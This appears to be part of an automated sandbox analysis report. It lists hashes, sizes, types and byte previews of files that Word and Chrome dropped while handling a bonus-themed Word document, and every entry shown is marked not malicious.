                                                                            SHA-512:F9716A67AB7E722A34E279AC087E411686D34004F92A92BBCD2115E46C591BFDA7BB2452EA50A8E1C4012AF32750EB03EBC774C4E4AAD42414042C58D25432C6
                                                                            Malicious:false
                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".b.u.+.w.n.i.N.S.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.y.Z.O.2.Z.m.
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:PNG image data, 159 x 159, 8-bit/color RGB, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):1652
                                                                            Entropy (8bit):7.639661271651922
                                                                            Encrypted:false
                                                                            SSDEEP:48:X5RC4iNzvkfq1nehLBHkaur053CtDucsuiZnLS1:pRCBpeqsMYBWScKZnG1
                                                                            MD5:1F0889FF5C117AFCD3304FFB2AFC43BA
                                                                            SHA1:F736A468CA5EA22253DD3469A9510F509574A98D
                                                                            SHA-256:712468402E87BC3C1053D2AE137DC84F1CBC0DFD76782CE8D1216F64B8124F8E
                                                                            SHA-512:2396D0955B48AD43ABC20FAB5F45E8A1F923255DF4A33756048E6A48E92AA45FF9B923B4D273F29246148773DA12DBCB628AAB197F11E2C685D2C2FE0F6632A0
                                                                            Malicious:false
                                                                            Preview:.PNG........IHDR.............hy.....;IDATx....:.Co/...<......D&.ey...ck*.qd.........'...........Q....O:.uL..S...9.....:jy.(..2.i.EG.V.w..02..Yt.E%v..w.y.F..z.........A.p.P......&v..w..Pf9....(...e3:....W.@b.x...2.\AG.vj...Ew.:...`.Ib.x..e./}..S....?w....Cn.;.......|.Y.]T...LBe!Y..y..S..3.3o...O.*...Rtr2.....]g.]gP.y....w..mMU.....T.}..........D\.IGZ..:!`w|.... .L..u&.u.I.......!w.L.:@.i5..d..]......N.T/...8y.5Y..*8.$v..w.Ayfr.6JP.K..fuw.7Zbt....W..u&.ufv.x..>...3s.2...w ._......B..k...4M...K......]g.]gZ.....Y\..<...)Y...=M..... e.0R]U...8.2Z..U&...]g.]g..yT]..^.3.N............!..L.......A....!"W...db?y. .u...*5...h..j<.K}.J...]g.]gZ{fU..^.0H.].A.8.;m...=s.M...k.oT..T."`....B....V......~.y..1.hSic5..j..k.j.G$v..w.i..`r.<+.k..K..z...:8Us.E.......R.H.........@....!./%.u.......RBr.....9..L...{..} k...@'.<.y'.....='v..w.y.....M.......yg..K...'v..w...f.[.G3?.9.a.....+.?$v..w...n...l0).`B..%Y..K.$v..w.A'...W[..t.....<.d2..,>I.:..:........
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):1057
                                                                            Entropy (8bit):7.6851406288304105
                                                                            Encrypted:false
                                                                            SSDEEP:24:Qb0EcwtZDFHs70yTIy9pEq0WVBtXVMDug3iLRciNe47zz:QIEFA7pdl3tFEWRRPz
                                                                            MD5:ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
                                                                            SHA1:ECA56C4904354EED5DA0DEBCD6BD66856AB4784D
                                                                            SHA-256:F664B8138C2DA6EC7565500A7CC839DA6372614A31DC04C5A2169A26B8D9767C
                                                                            SHA-512:3BFB696318DDB93540140DBCD4DBB32F129441E46EE752C6B7379624488533BA27CC7EFF3CAE444C1797CA6EECDF333EDAF443AC84CDEB037A890967091CF91C
                                                                            Malicious:false
                                                                            Preview:.PNG........IHDR...l.................pHYs...........~.....IDATh..XMN.P..\.E......' ,.-.$'.H....s...1.vQ.......4.........-.<......{..|.?.w[4....A.=h<>.......7..t.u..]A{..&...,..h.`D4.01]......H.&..C.w...@....*..a..3..H.aR.=.g.(.0.6...;Wl...X.X..G.Bf.....D4...K..p... ..hh.-b.R.Z....Z..zYQc}....u^..R.Dzm$..%c".....C.*z.\&U9P..0.3s*..31..@...W..2....yG.....c)k.F....3.I!....2..F.....`%1.....-..U.s(.p..S.($/...}(.5.\"k.+.I.Q...cb....kt..o.`.........%L....;.J.[..b.xx)c,X7.....)..'.n..H=E<.B.].g.}f.o...........znJ.....Q$....7...#.&..g.D..X....F..~=...%IQ.........e.....>.R..............s..[.D|l.n&..a06..d.5.5YGC..3N......<..Pt..\<{b...i.....)!.....8...0.t_.....8..T.......)G.-mzK....../..TDK..k..s"ch.0....i..`...`V..H.Q"...x......!.."..Q..%3O.L.....$....e.s.m..||.......AD."...#.%b,'..r!.}c...X!2kCD6..iX.\@S..3Er....B...D...%.O...(._...-....{b......z........r.N..W2....L.1~-.J.?.l....?..q:..W.5&.....|..>.B...G.oa.S.....1......Zo...q.....
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):3126
                                                                            Entropy (8bit):2.69128579938811
                                                                            Encrypted:false
                                                                            SSDEEP:24:6YpGDknuACxxZ3RhPgezgCOYuzOcu3RhPgezFwm+TfQyCqrHJW9/7RghRKEuLJWF:6Yo4nogezgzOTgezExighRK+4Y
                                                                            MD5:61BFF7335760E77A2CB281D3B7B93DB4
                                                                            SHA1:7135032945C6B178CC52C42985D3F66A844C4F27
                                                                            SHA-256:F4B3BF056F864EDCF466926BACDD1A866EB4F0735847B25B2B567F0904FBBEB8
                                                                            SHA-512:D4D8DDAB44A445E157580967FB51B2983C79FE2F1A20416C16637893DD671FB4AAD52F49217E7A71A9A31942CE5B7AD842EBFDDA1254318DDF8D71C8F4C9D2E1
                                                                            Malicious:false
                                                                            Preview:........................................P.A.G.E............./.....E.n.h.a.n.c.e.d. .B.o.n.u.s. .D.i.s.t.r.i.b.u.t.i.o.n. .S.t.r.a.t.e.g.y....................................................................................................................................................................................................................................................................................................................................................................................................................................... ..."...$...4...6...:...<...@...B..........................................................................................................................................................................................................................................................................................7...$..$.If........!v..h.#v...!:V.......4..6......5......./.............3........4......P.4........a....f4..T.....l..........
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:ASCII text, with very long lines (1345), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):20971520
                                                                            Entropy (8bit):0.015329085638355907
                                                                            Encrypted:false
                                                                            SSDEEP:1536:nXTrLQyjXvMckjZoa/hcvBnx9HvAWZmrwdEsqdBf:Xo
                                                                            MD5:3F08AE9A6D26266E77340F1EBBAD13D8
                                                                            SHA1:F2DA926524E0E40F719615AD28E9396F9ECD2965
                                                                            SHA-256:AE4C8669B35739A760A43E1D32071F0BCBAA4070D3A03C6BEB1007A0DC037887
                                                                            SHA-512:9992324B6E995428C1D39BA0A9171994F1C660AD701AD79DD75B3C7A4CD5E7F8D1F774D0C520FE4DE8FB6DDC6C8F0377D5DA0E60F2A71F4DADF2EDEDBBAD568C
                                                                            Malicious:false
                                                                            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/19/2024 14:36:04.322.WINWORD (0xFAC).0x13C4.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":22,"Time":"2024-12-19T14:36:04.322Z","Contract":"Office.System.Activity","Activity.CV":"NlCVyS2FDEWPRFYRPdoUzw.7.1","Activity.Duration":151,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...12/19/2024 14:36:04.322.WINWORD (0xFAC).0x13C4.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-12-19T14:36:04.322Z","Contract":"Office.System.Activity","Activity.CV":"NlCVyS2FDEWPRFYRPdoUzw.7","Activity.Duration":469,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureDiag
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):20971520
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3::
                                                                            MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                            SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                            SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                            SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                            Malicious:false
                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):30
                                                                            Entropy (8bit):1.2389205950315936
                                                                            Encrypted:false
                                                                            SSDEEP:3:Molh/t:Mor
                                                                            MD5:2DB5C6AC023031DBA61107B4CAFDCECE
                                                                            SHA1:2628D45FA27C9AA074D0A7FBBAA60F072AB01F72
                                                                            SHA-256:E4FE006637F997EFEB628FB76FCEB2F5A66D7BB05F342855648E7C46EE93D1E3
                                                                            SHA-512:85CDFE50337BC92EE984798E42F502D39B0545CCC689FDA7C2E9B6DC7B16F4CB2E5951CFAB0DC36FB6060C6B64198DDB990FD9A003744E1360AC661785C567F0
                                                                            Malicious:false
                                                                            Preview:....;.........................
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Feb 7 13:52:10 2024, mtime=Thu Dec 19 13:36:05 2024, atime=Thu Dec 19 13:36:03 2024, length=38076, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):631
                                                                            Entropy (8bit):4.742121285112085
                                                                            Encrypted:false
                                                                            SSDEEP:12:89aFxVMSjTx58kjAy0HiTdVk83Tx58ZBmcmV:89urjTxAy0CTRTQBJm
                                                                            MD5:6E6C3DFA4889531178465A8B7BB0956F
                                                                            SHA1:FF154E7FDD1CF5BE2C28BE38C711708DAD61AA0A
                                                                            SHA-256:E3764AA54EAB8CB5083907AE731D5E3ADF0279080E6C82F079E8C138642908D4
                                                                            SHA-512:98B2D5CAF3108DA223FA66F01585BFE33FA6A4D591EE36EB5719846EC3F9384B827F6C8B7205630292021C85F7BA5AAF140F734477C073CFFF6989EAD0285C4C
                                                                            Malicious:false
                                                                            Preview:L..................F.... ......:.Y....U#R...sT#R..............................2......Y.t .GIOIAF~1.DOC..|......GX.v.Y.t..........................%.}.G.i.o.i.a. .F.a.g.g.i.o.l.i.-.E.n.d. .O.f. .Y.e.a.r.-.B.o.n.u.s...d.o.c.x.......l...............-.......k............F.......C:\Users\user\Desktop\Gioia Faggioli-End Of Year-Bonus.docx..<.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.G.i.o.i.a. .F.a.g.g.i.o.l.i.-.E.n.d. .O.f. .Y.e.a.r.-.B.o.n.u.s...d.o.c.x.`.......X.......103386...........hT..CrF.f4... .I..F...../....%..hT..CrF.f4... .I..F...../....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:Generic INItialization configuration [folders]
                                                                            Category:dropped
                                                                            Size (bytes):99
                                                                            Entropy (8bit):4.801328367687133
                                                                            Encrypted:false
                                                                            SSDEEP:3:HpJF6LJuPcqUlm4nUF6LJuPcqUlv:HpJF6LJudRF6LJud2
                                                                            MD5:F80FF6C154EB3D919790F8E626F174B8
                                                                            SHA1:CBCEF2168A77B06B601D3607EC47F4464F2CA2A8
                                                                            SHA-256:2178749819A182BBDADB90DFD4FD28C6C8ECBDB21CF7247BBA76562CEE500A60
                                                                            SHA-512:BA4A42844FDC0AA09B3C42DB6EB2D813ADC7B0BA24309402FC73BE2CAFA80928958C5FAEA701A3DB5554BB6B0FC9E059D9EF5C889819D4576CC7EAC13DD186A9
                                                                            Malicious:false
                                                                            Preview:[misc]..Gioia Faggioli-End Of Year-Bonus.LNK=0..[folders]..Gioia Faggioli-End Of Year-Bonus.LNK=0..
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):18
                                                                            Entropy (8bit):2.725480556997868
                                                                            Encrypted:false
                                                                            SSDEEP:3:QRi54vl:QP9
                                                                            MD5:A5E51FDFAF429614FB5218AB559D299A
                                                                            SHA1:262EC76760BB9A83BCFF955C985E70820DF567AE
                                                                            SHA-256:3E82E9F60CE38815C28B0E5323268BDA212A84C3A9C7ACCC731360F998DF0240
                                                                            SHA-512:9B68F1C04BDE0024CECFC05A37932368CE2F09BD96C72AB0442E16C8CF5456ED9BB995901095AC1BBDF645255014A5E43AADEE475564F01CA6BE3889C96C29C9
                                                                            Malicious:false
                                                                            Preview:..t.o.r.r.e.s.....
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:Qn:Qn
                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                            Malicious:false
                                                                            Preview:..
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):12
                                                                            Entropy (8bit):0.41381685030363374
                                                                            Encrypted:false
                                                                            SSDEEP:3:/l:
                                                                            MD5:E4A1661C2C886EBB688DEC494532431C
                                                                            SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                            SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                            SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                            Malicious:false
                                                                            Preview:............
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):12
                                                                            Entropy (8bit):0.41381685030363374
                                                                            Encrypted:false
                                                                            SSDEEP:3:/l:
                                                                            MD5:E4A1661C2C886EBB688DEC494532431C
                                                                            SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                            SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                            SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                            Malicious:false
                                                                            Preview:............
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):12
                                                                            Entropy (8bit):0.41381685030363374
                                                                            Encrypted:false
                                                                            SSDEEP:3:/l:
                                                                            MD5:E4A1661C2C886EBB688DEC494532431C
                                                                            SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                            SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                            SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                            Malicious:false
                                                                            Preview:............
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):12
                                                                            Entropy (8bit):0.41381685030363374
                                                                            Encrypted:false
                                                                            SSDEEP:3:/l:
                                                                            MD5:E4A1661C2C886EBB688DEC494532431C
                                                                            SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                            SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                            SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                            Malicious:false
                                                                            Preview:............
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 13:36:12 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2677
                                                                            Entropy (8bit):3.989074839808642
                                                                            Encrypted:false
                                                                            SSDEEP:48:8gzdITh7eoJHkidAKZdA1JehwiZUklqehSy+3:8g6EoI1y
                                                                            MD5:3018CB13A975D8D8D00EFEEFC7A69FD4
                                                                            SHA1:785BDB15B36B1DC54E194373815FB69B6D044054
                                                                            SHA-256:A3692E030C7DEEFEC763814EBD029302B7A2D6FBDF872233B00AB50B0107B746
                                                                            SHA-512:003CF5DB7730B829ABF3CD869E9875AB3A7FEA06C12EB6D998DE80CF75E457895D60A5A66C8D5BB111718F49322ACB49BDFF1F96F011AB79917936BCBA382276
                                                                            Malicious:false
                                                                            Preview:L..................F.@.. ...$+.,......8Z#R......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Yyt....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.t....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.t....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.t...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.t...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............N.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 13:36:12 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2679
                                                                            Entropy (8bit):4.004809499293502
                                                                            Encrypted:false
                                                                            SSDEEP:48:8lzdITh7eoJHkidAKZdA10eh/iZUkAQkqehly+2:8l6Eoy9Q0y
                                                                            MD5:A0B057E28F2D11203266669DE2789FF8
                                                                            SHA1:6448E3FC98E6A4BC6A3CEBF9C55596BF1CB8FF7A
                                                                            SHA-256:13ADAE7BAC5E8D493DAB287A12EFB1F305BF3A97BE41514F8C9B87CDD2ADBB28
                                                                            SHA-512:E5B0A127AF8DCDD8AFC35804D59281F9024F63409CC9076CFFF92EA0692CFDAC1EC6CB70EE6E7341F1BCD1532D0952ECC1A6092846F0546CA23B161C18DF6231
                                                                            Malicious:false
                                                                            Preview:L..................F.@.. ...$+.,......*Z#R......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Yyt....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.t....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.t....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.t...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.t...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............N.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2693
                                                                            Entropy (8bit):4.01255500629605
                                                                            Encrypted:false
                                                                            SSDEEP:48:8ezdITh7ejHkidAKZdA14tIeh7sFiZUkmgqeh7svy+BX:8e6EQnhy
                                                                            MD5:1E075F0520BF1FA9A509A1862FBC8A42
                                                                            SHA1:E7A0BEE67EE9B9EB0BAF3C4040B5C7943DC7AEBC
                                                                            SHA-256:10738B6A470F591FEF83A75B3EBDEF0D6FE9069A4C81821E813A1DBDADC43549
                                                                            SHA-512:7AC36C4D7BC9B5F47D1ABFF56734E54242EDE430D5C8CBA0CF398E0FE125B98A0A8DB8F4D1A7FC841E6C87FA2E7066FE014C5E904878BAE2818F1AFC4E65FA85
                                                                            Malicious:false
                                                                            Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Yyt....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.t....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.t....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.t...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............N.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 13:36:12 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2681
                                                                            Entropy (8bit):4.005303122104292
                                                                            Encrypted:false
                                                                            SSDEEP:48:8zkzdITh7eoJHkidAKZdA1behDiZUkwqehZy+R:8Q6EoJny
                                                                            MD5:220DB5CB415DF57D070E580357ED3FB1
                                                                            SHA1:68D22A8936BF3534E5661A3062A38DB837C7BC3D
                                                                            SHA-256:53A3B73F1E0FC2FB4A4E258FF5F0EA58CA23FBBA4F97DA04D002287977046577
                                                                            SHA-512:AFE895F0D1051DD32F07E64661F66AD46186332644CC2B79AC3BBDACD6AA517BD62C694358B13A5AE3B0A56A1471375986343867C32ADD51B288EAD2EC1B4D25
                                                                            Malicious:false
                                                                            Preview:L..................F.@.. ...$+.,......#Z#R......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Yyt....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.t....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.t....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.t...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.t...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............N.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 13:36:12 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2681
                                                                            Entropy (8bit):3.99188582396032
                                                                            Encrypted:false
                                                                            SSDEEP:48:8tzdITh7eoJHkidAKZdA1VehBiZUk1W1qehry+C:8t6Eo59Ly
                                                                            MD5:E21C02BF910C7193E9CC748A82FE24F3
                                                                            SHA1:E9224D56C07D55C99A5BFFC187A29837AD5636A1
                                                                            SHA-256:4EBC189054357C3FEB7D7759016E9CD8DBBFD522A67853CFF333213B89413BF2
                                                                            SHA-512:ECD9C36A34E264896A346A7893539745B23F09F7E7C9980B07E132E0E71C2CCE8C5A855606E49C1150DB10B97D52250F7B0B2A01D86855744D6020395AE62A9E
                                                                            Malicious:false
